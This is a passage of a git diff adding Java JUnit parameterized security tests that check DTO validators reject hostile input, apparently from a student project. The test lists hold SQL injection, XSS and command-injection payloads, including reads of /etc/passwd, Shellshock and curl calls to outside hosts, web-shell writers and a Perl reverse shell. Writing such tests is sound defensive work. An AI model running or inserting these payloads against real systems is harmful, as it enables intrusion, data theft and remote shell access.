'%'='", + "AND 1=0 AND '%'='", + "AND 1083=1083 AND (1427=1427", + "AND 7506=9091 AND (5913=5913", + "AND 1083=1083 AND ('1427=1427", + //auth based sql injectio + "'-'", + "' '", + "'&'", + "'^'", + "'*'", + "' or ''-'", + "' or '' '", + "' or ''&'", + "' or ''^'", + "' or ''*'", + "\"-\"", + "\" \"", + "\"&\"", + "\"^\"", + "\"*\"", + "\" or \"\"-\"", + "\" or \"\" \"", + "\" or \"\"&\"", + "\" or \"\"^\"", + "\" or \"\"*\"", + "or true--", + "\" or true--", + "' or true--", + "\") or true--", + "') or true--", + "' or 'x'='x", + "') or ('x')=('x", + "')) or (('x'))=(('x", + "\" or \"x\"=\"x", + "\") or (\"x\")=(\"x", + "\")) or ((\"x\"))=((\"x", + "or 1=1", + "or 1=1--", + "or 1=1#", + "or 1=1/*", + "admin' --", + "admin' #", + "admin'/*", + "admin' or '1'='1", + "admin' or '1'='1'--", + "admin' or '1'='1'#", + "admin' or '1'='1'/*", + "admin'or 1=1 or ''='", + "admin' or 1=1", + "admin' or 1=1--", + "admin' or 1=1#", + "admin' or 1=1/*", + "admin') or ('1'='1", + "admin') or ('1'='1'--", + "admin') or ('1'='1'#", + "admin') or ('1'='1'/*", + "admin') or '1'='1", + "admin') or '1'='1'--", + "admin') or '1'='1'#", + "admin') or '1'='1'/*", + "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", + "admin\" --", + "admin\" #", + "admin\"/*", + "admin\" or \"1\"=\"1", + "admin\" or \"1\"=\"1\"--", + "admin\" or \"1\"=\"1\"#", + "admin\" or \"1\"=\"1\"/*", + "admin\"or 1=1 or \"\"=\"", + "admin\" or 1=1", + "admin\" or 1=1--", + "admin\" or 1=1#", + "admin\" or 1=1/*", + "admin\") or (\"1\"=\"1", + "admin\") or (\"1\"=\"1\"--", + "admin\") or (\"1\"=\"1\"#", + "admin\") or (\"1\"=\"1\"/*", + "admin\") or \"1\"=\"1", + "admin\") or \"1\"=\"1\"--", + "admin\") or \"1\"=\"1\"#", + "admin\") or \"1\"=\"1\"/*", + "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055", + //XSS + "'`\"><\\x3Cscript>javascript:alert(1)", + "'`\"><\\x00script>javascript:alert(1)", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "\\x3Cscript>javascript:alert(1)", + "'\"`>", + "", + "", + "--> -->", + "-->", + "", + "", + "", + "", + "", + "", + "t>", + "'-prompt(8)-'", + "\"-prompt(8)-\"", + "\";a=prompt,a()//\"", + "\"';a=prompt,a()//\"", + "'-eval(\"window['pro'%2B'mpt'](8)\")-'", + "\"-eval(\"window['pro'%2B'mpt'](8)\")-\"", + }) + @DisplayName("Security Test for ReviewDTOSaveRequest") + public void testSecurityVulnerabilitiesForSave(String text) { + ReviewDTOSaveRequest response = new ReviewDTOSaveRequest(text, 1,1L,1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + @ParameterizedTest + @CsvSource({ + "'1; DROP TABLE users;'", + "''", + "''", + "'',", + "''", + "''", + "''", + "'/index.html|id|'", + "';id;'", + "';id'", + "';netstat -a;'", + "';system(\'cat /etc/passwd\')'", + "'|id'", + "'|/usr/bin/id'", + "'|id|'", + "'|/usr/bin/id|'", + "'||/usr/bin/id|'", + "'|id;', 1", + "'||/usr/bin/id;'", + "';id|'", + "';|/usr/bin/id|'", + "'\\n/bin/ls -al\\n'", + "'\\n/usr/bin/id\\n'", + "'\\nid\\n'", + "'\\n/usr/bin/id;'", + "'\\nid;'", + "'\\n/usr/bin/id|'", + "'\\nid|'", + "';/usr/bin/id\\n'", + "';id\\n'", + "'|usr/bin/id\\n'", + "'|nid\\n'", + "'`id`'", + "'`/usr/bin/id`'", + "'a);id'", + "'a;id'", + "'a);id;'", + "'a;id;'", + "'a);id|'", + "'a;id|'", + "'a)|id'", + "'a|id'", + "'a)|id;'", + "'a|id'", + "'|/bin/ls -al'", + "'a);/usr/bin/id'", + "'a;/usr/bin/id'", + "'a);/usr/bin/id;'", + "'a;/usr/bin/id;'", + "'a);/usr/bin/id|'", + "'a;/usr/bin/id|'", + "'a)|/usr/bin/id'", + "'a|/usr/bin/id'", + "'a)|/usr/bin/id;'", + "'a|/usr/bin/id'", + "';system(\'cat /etc/passwd\')'", + "';system(\'id\')', 1", + "';system(\'/usr/bin/id\')'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A'", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A', 1", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "||", + "|", + ";", + "'", + "'\"", + "\"'", + "&", + "&&", + "%0a", + "%0a%0d", + "%0Aid", + "%0a id %0a", + "%0Aid%0A", + "%0a ping -i 30 127.0.0.1 %0a", + "%0A/usr/bin/id", + "%0A/usr/bin/id%0A", + "%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1`", + "#' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\"", + "|ping -n 21 127.0.0.1", + "%20{${phpinfo()}}", + "%20{${sleep(20)}}", + "%20{${sleep(3)}}", + "a|id|", "a;id|", + "a;id;", + "a;id\n", + "() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12", + "| curl http://crowdshield.com/.testing/rce.txt", + "& curl http://crowdshield.com/.testing/rce.txt", + "; curl https://crowdshield.com/.testing/rce_vuln.txt", + "&& curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt`", + "#' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\"", + "|curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)", + "| dir", "; dir", "$(`dir`)", "& dir", + "&&dir", "&& dir", "| dir C:\\", "; dir C:\\", + "& dir C:\\", "&& dir C:\\", "dir C:\\", + "| dir C:\\Documents and Settings\\*", + "; dir C:\\Documents and Settings\\*", + "& dir C:\\Documents and Settings\\*", + "&& dir C:\\Documents and Settings\\*", + "dir C:\\Documents and Settings\\*", + "| dir C:\\Users", "; dir C:\\Users", + "& dir C:\\Users", "&& dir C:\\Users", + "dir C:\\Users", ";echo%20''", + "echo ''// XXXXXXXXXXX", + "| echo \"\" > rfi.php", + "; echo \"\" > rfi.php", + "& echo \"\" > rfi.php", + "&& echo \"\" > rfi.php", + "echo \"\" > rfi.php", + "| echo \"\" > dir.php", + "; echo \"\" > dir.php", + "& echo \"\" > dir.php", + "&& echo \"\" > dir.php", + "echo \"\" > dir.php", + "| echo \"\" > cmd.php", + "; echo \"\" > cmd.php", + "& echo \"\" > cmd.php", + "&& echo \"\" > cmd.php", + "echo \"\" > cmd.php", + ";echo ''", + "echo ''// XXXXXXXXXXX", + "echo ''// XXXXXXXXXXX", + "| echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "; echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "&& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "() { :;}; echo vulnerable 10", + "eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')", + "eval('ls')", + "OR 1=1", + "OR 1=0", + "OR x=x", + "OR x=y", + "OR 1=1#", + "OR 1=0#", + "OR x=x#", + "OR x=y#", + "OR 1=1--", + "OR 1=0--", + "OR x=x--", + "OR x=y--", + "OR 3409=3409 AND ('pytW' LIKE 'pytW", + "OR 3409=3409 AND ('pytW' LIKE 'pytY", + "HAVING 1=1", + "HAVING 1=0", + "HAVING 1=1#", + "HAVING 1=0#", + "HAVING 1=1--", + "HAVING 1=0--", + "AND 1=1", + "AND 1=0", + "AND 1=1--", + "AND 1=0--", + "AND 1=1#", + "AND 1=0#", + "AND 1=1 AND '%'='", + "AND 1=0 AND '%'='", + "AND 1083=1083 AND (1427=1427", + "AND 7506=9091 AND (5913=5913", + "AND 1083=1083 AND ('1427=1427", + //auth based sql injectio + "'-'", + "' '", + "'&'", + "'^'", + "'*'", + "' or ''-'", + "' or '' '", + "' or ''&'", + "' or ''^'", + "' or ''*'", + "\"-\"", + "\" \"", + "\"&\"", + "\"^\"", + "\"*\"", + "\" or \"\"-\"", + "\" or \"\" \"", + "\" or \"\"&\"", + "\" or \"\"^\"", + "\" or \"\"*\"", + "or true--", + "\" or true--", + "' or true--", + "\") or true--", + "') or true--", + "' or 'x'='x", + "') or ('x')=('x", + "')) or (('x'))=(('x", + "\" or \"x\"=\"x", + "\") or (\"x\")=(\"x", + "\")) or ((\"x\"))=((\"x", + "or 1=1", + "or 1=1--", + "or 1=1#", + "or 1=1/*", + "admin' --", + "admin' #", + "admin'/*", + "admin' or '1'='1", + "admin' or '1'='1'--", + "admin' or '1'='1'#", + "admin' or '1'='1'/*", + "admin'or 1=1 or ''='", + "admin' or 1=1", + "admin' or 1=1--", + "admin' or 1=1#", + "admin' or 1=1/*", + "admin') or ('1'='1", + "admin') or ('1'='1'--", + "admin') or ('1'='1'#", + "admin') or ('1'='1'/*", + "admin') or '1'='1", + "admin') or '1'='1'--", + "admin') or '1'='1'#", + "admin') or '1'='1'/*", + "1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055", + "admin\" --", + "admin\" #", + "admin\"/*", + "admin\" or \"1\"=\"1", + "admin\" or \"1\"=\"1\"--", + "admin\" or \"1\"=\"1\"#", + "admin\" or \"1\"=\"1\"/*", + "admin\"or 1=1 or \"\"=\"", + "admin\" or 1=1", + "admin\" or 1=1--", + "admin\" or 1=1#", + "admin\" or 1=1/*", + "admin\") or (\"1\"=\"1", + "admin\") or (\"1\"=\"1\"--", + "admin\") or (\"1\"=\"1\"#", + "admin\") or (\"1\"=\"1\"/*", + "admin\") or \"1\"=\"1", + "admin\") or \"1\"=\"1\"--", + "admin\") or \"1\"=\"1\"#", + "admin\") or \"1\"=\"1\"/*", + "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055", + //XSS + "'`\"><\\x3Cscript>javascript:alert(1)", + "'`\"><\\x00script>javascript:alert(1)", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "", + "\\x3Cscript>javascript:alert(1)", + "'\"`>", + "", + "", + "--> -->", + "-->", + "", + "", + "", + "", + "", + "", + "t>", + "'-prompt(8)-'", + "\"-prompt(8)-\"", + "\";a=prompt,a()//\"", + "\"';a=prompt,a()//\"", + "'-eval(\"window['pro'%2B'mpt'](8)\")-'", + "\"-eval(\"window['pro'%2B'mpt'](8)\")-\"", + }) + @DisplayName("Security Test for ReviewDTOSaveRequest") + public void testSecurityVulnerabilitiesForPatch(String text) { + ReviewDTOPatchRequest response = new ReviewDTOPatchRequest(1L,text, 1,1L,1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + //Test for other stuff + + @ParameterizedTest + @CsvSource(textBlock = """ + -1 + -123 + -4563 + -75457 + -256235 + 34 + -5 + 6 + 7 + 8 + 9 + 10 + """) + @DisplayName("Security Test for Rating") + public void testSecurityVulnerabilitiesForRating(int rating){ + ReviewDTOSaveRequest response = new ReviewDTOSaveRequest("text", rating,1L,1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + @ParameterizedTest + @CsvSource(textBlock = + """ + -1 + -2 + -3 + -897354897 + -34589724 + """) + @DisplayName("Security Test for UserId") + public void testSecurityVulnerabilitiesForUserId(int rating) { + ReviewDTOPatchRequest response = new ReviewDTOPatchRequest(1L, "text", rating, 1L, 1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + @ParameterizedTest + @CsvSource(textBlock = + """ + -4 + -14 + -24 + -8354897 + -94535724 + """) + @DisplayName("Security Test for PacoteId") + public void testSecurityVulnerabilitiesForPacoteId(int rating) { + ReviewDTOPatchRequest response = new ReviewDTOPatchRequest(1L, "text", rating, 1L, 1L); + Set> violations = validator.validate(response); + assertFalse(violations.isEmpty()); + } + + +} \ No newline at end of file diff --git a/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/TipoPacoteDTOTest.java b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/TipoPacoteDTOTest.java new file mode 100644 index 00000000..1473e9f7 --- /dev/null +++ b/desofsApi/src/test/java/isep/ipp/pt/api/desofs/securityTests/TipoPacoteDTOTest.java @@ -0,0 +1,401 @@ +package isep.ipp.pt.api.desofs.securityTests; + +import isep.ipp.pt.api.desofs.Dto.TipoPacoteDTO.ControllerLayer.TipoPacoteDTOResponse; +import isep.ipp.pt.api.desofs.Dto.TipoPacoteDTO.ControllerLayer.TipoPacoteDTOSaveRequest; +import jakarta.validation.ConstraintViolation; +import jakarta.validation.Validation; +import jakarta.validation.Validator; +import org.junit.jupiter.api.BeforeEach; +import org.junit.jupiter.api.DisplayName; +import org.junit.jupiter.params.ParameterizedTest; +import org.junit.jupiter.params.provider.CsvSource; +import org.springframework.boot.test.context.SpringBootTest; + +import java.util.Set; + +import static org.junit.jupiter.api.Assertions.*; + +@SpringBootTest +class TipoPacoteDTOTest { + + private Validator validator; + @BeforeEach + void setUp() { + validator = Validation.buildDefaultValidatorFactory().getValidator(); + } + @ParameterizedTest + @CsvSource({ + "ValidName, 1, 0", + "'', 1, 2", + "Invalid@Name, 1, 1", + "ThisNameIsWayTooLong, 1, 1", + "ValidName, , 1", + "ValidName, -1, 1" + }) + @DisplayName("Parameterized Test for TipoPacoteDTOResponse") + public void testTipoPacoteDTOResponse(String nome, Long tipoPacoteId, int expectedViolationCount) { + TipoPacoteDTOResponse response = new TipoPacoteDTOResponse(nome, tipoPacoteId); + Set> violations = validator.validate(response); + assertEquals(expectedViolationCount, violations.size()); + } + + @ParameterizedTest + @CsvSource({ + "'1; DROP TABLE users;'", + "''", + "''", + "'',", + "''", + "''", + "''", + "'/index.html|id|'", + "';id;'", + "';id'", + "';netstat -a;'", + "';system(\'cat /etc/passwd\')'", + "'|id'", + "'|/usr/bin/id'", + "'|id|'", + "'|/usr/bin/id|'", + "'||/usr/bin/id|'", + "'|id;', 1", + "'||/usr/bin/id;'", + "';id|'", + "';|/usr/bin/id|'", + "'\\n/bin/ls -al\\n'", + "'\\n/usr/bin/id\\n'", + "'\\nid\\n'", + "'\\n/usr/bin/id;'", + "'\\nid;'", + "'\\n/usr/bin/id|'", + "'\\nid|'", + "';/usr/bin/id\\n'", + "';id\\n'", + "'|usr/bin/id\\n'", + "'|nid\\n'", + "'`id`'", + "'`/usr/bin/id`'", + "'a);id'", + "'a;id'", + "'a);id;'", + "'a;id;'", + "'a);id|'", + "'a;id|'", + "'a)|id'", + "'a|id'", + "'a)|id;'", + "'a|id'", + "'|/bin/ls -al'", + "'a);/usr/bin/id'", + "'a;/usr/bin/id'", + "'a);/usr/bin/id;'", + "'a;/usr/bin/id;'", + "'a);/usr/bin/id|'", + "'a;/usr/bin/id|'", + "'a)|/usr/bin/id'", + "'a|/usr/bin/id'", + "'a)|/usr/bin/id;'", + "'a|/usr/bin/id'", + "';system(\'cat /etc/passwd\')'", + "';system(\'id\')', 1", + "';system(\'/usr/bin/id\')'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A'", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "'%0Acat /etc/passwd'", + "'%0A/usr/bin/id'", + "'%0Aid'", + "'%0A/usr/bin/id%0A'", + "'%0Aid%0A', 1", + "'& ping -i 30 127.0.0.1 &'", + "'& ping -n 30 127.0.0.1 &'", + "'%0a ping -i 30 127.0.0.1 %0a'", + "'`ping 127.0.0.1`'", + "||", + "|", + ";", + "'", + "'\"", + "\"'", + "&", + "&&", + "%0a", + "%0a%0d", + "%0Aid", + "%0a id %0a", + "%0Aid%0A", + "%0a ping -i 30 127.0.0.1 %0a", + "%0A/usr/bin/id", + "%0A/usr/bin/id%0A", + "%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1`", + "#' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\"", + "|ping -n 21 127.0.0.1", + "%20{${phpinfo()}}", + "%20{${sleep(20)}}", + "%20{${sleep(3)}}", + "a|id|", "a;id|", + "a;id;", + "a;id\n", + "() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12", + "| curl http://crowdshield.com/.testing/rce.txt", + "& curl http://crowdshield.com/.testing/rce.txt", + "; curl https://crowdshield.com/.testing/rce_vuln.txt", + "&& curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt`", + "#' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\"", + "|curl https://crowdshield.com/.testing/rce_vuln.txt", + "curl https://crowdshield.com/.testing/rce_vuln.txt", + "$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)", + "| dir", "; dir", "$(`dir`)", "& dir", + "&&dir", "&& dir", "| dir C:\\", "; dir C:\\", + "& dir C:\\", "&& dir C:\\", "dir C:\\", + "| dir C:\\Documents and Settings\\*", + "; dir C:\\Documents and Settings\\*", + "& dir C:\\Documents and Settings\\*", + "&& dir C:\\Documents and Settings\\*", + "dir C:\\Documents and Settings\\*", + "| dir C:\\Users", "; dir C:\\Users", + "& dir C:\\Users", "&& dir C:\\Users", + "dir C:\\Users", ";echo%20''", + "echo ''// XXXXXXXXXXX", + "| echo \"\" > rfi.php", + "; echo \"\" > rfi.php", + "& echo \"\" > rfi.php", + "&& echo \"\" > rfi.php", + "echo \"\" > rfi.php", + "| echo \"\" > dir.php", + "; echo \"\" > dir.php", + "& echo \"\" > dir.php", + "&& echo \"\" > dir.php", + "echo \"\" > dir.php", + "| echo \"\" > cmd.php", + "; echo \"\" > cmd.php", + "& echo \"\" > cmd.php", + "&& echo \"\" > cmd.php", + "echo \"\" > cmd.php", + ";echo ''", + "echo ''// XXXXXXXXXXX", + "echo ''// XXXXXXXXXXX", + "| echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "; echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">;S\");open(STDOUT,\">;S\");open(STDERR,\">;S\");exec('/bin/sh -i');};\" > rev.pl", + "& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "&& echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "echo \"use Socket;$i=\"192.168.16.151\";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec('/bin/sh -i');};\" > rev.pl", + "() { :;}; echo vulnerable 10", + "eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')", + "eval('ls')", + "OR 1=1", + "OR 1=0", + "OR x=x", + "OR x=y", + "OR 1=1#", + "OR 1=0#", + "OR x=x#", + "OR x=y#", + "OR 1=1--", + "OR 1=0--", + "OR x=x--", + "OR x=y--", + "OR 3409=3409 AND ('pytW' LIKE 'pytW", + "OR 3409=3409 AND ('pytW' LIKE 'pytY", + "HAVING 1=1", + "HAVING 1=0", + "HAVING 1=1#", + "HAVING 1=0#", + "HAVING 1=1--", + "HAVING 1=0--", + "AND 1=1", + "AND 1=0", + "AND 1=1--", + "AND 1=0--", + "AND 1=1#", + "AND 1=0#", + "AND 1=1 AND '%'='", + "AND 1=0 AND '%'='", + "AND 1083=1083 AND (1427=1427", + "AND 7506=9091 AND (5913=5913", + "AND 1083=1083 AND ('1427=1427", + //auth based sql injectio + "'-'", + "' '", + "'&'", + "'^'", + "'*'", + "' or ''-'", + "' or '' '", + "' or ''&'", + "' or ''^'", + "' or ''*'", + "\"-\"", + "\" \"", + "\"&\"", + "\"^\"", + "\"*\"", + "\" or \"\"-\"", + "\" or \"\" \"", + "\" or \"\"&\"", + "\" or \"\"^\"", + "\" or \"\"*\"", + "or true--", + "\" or true--", + "' or true--", + "\") or true--", + "') or true--", + "' or 'x'='x", + "') or ('x')=('x", + "')) or (('x'))=(('x", + "\" or 